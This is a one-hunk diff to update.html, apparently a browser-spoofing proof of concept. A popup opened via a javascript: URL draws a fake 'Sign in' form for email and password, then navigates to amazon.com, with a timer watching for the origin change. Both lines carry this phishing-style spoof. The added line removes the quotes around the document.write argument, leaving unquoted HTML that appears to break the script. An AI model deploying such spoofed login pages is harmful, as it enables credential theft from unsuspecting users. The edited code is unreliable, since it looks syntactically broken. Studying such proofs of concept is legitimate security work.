--- a/update.html
+++ b/update.html
@@ -13,7 +13,7 @@
               }
       
         function f() {
-                w = window.open("javascript:document.write('<h1>Sign in</h1><form><input id=email type=email placeholder=Email required><input id=pass type=password placeholder=Password required><input type=submit value=Login></form><div id=result></div><script>document.forms[0].onsubmit=function(e){e.preventDefault();document.getElementById(\\'result\\').innerHTML=\\'<p>Email: \\'+email.value+\\'</p><p>Password: \\'+pass.value+\\'</p>\\';}<\\/script>');location='http://amazon.com'","new","width=500 height=500");                
+                w = window.open("javascript:document.write(<h1>Sign in</h1><form><input id=email type=email placeholder=Email required><input id=pass type=password placeholder=Password required><input type=submit value=Login></form><div id=result></div><script>document.forms[0].onsubmit=function(e){e.preventDefault();document.getElementById(\\'result\\').innerHTML=\\'<p>Email: \\'+email.value+\\'</p><p>Password: \\'+pass.value+\\'</p>\\';}<\\/script>);location='http://amazon.com'","new","width=500 height=500");                
                 i = setInterval("try { x = w.location.href; } catch(e) { clearInterval(i); next(); }", 1); 
             }
       </script>
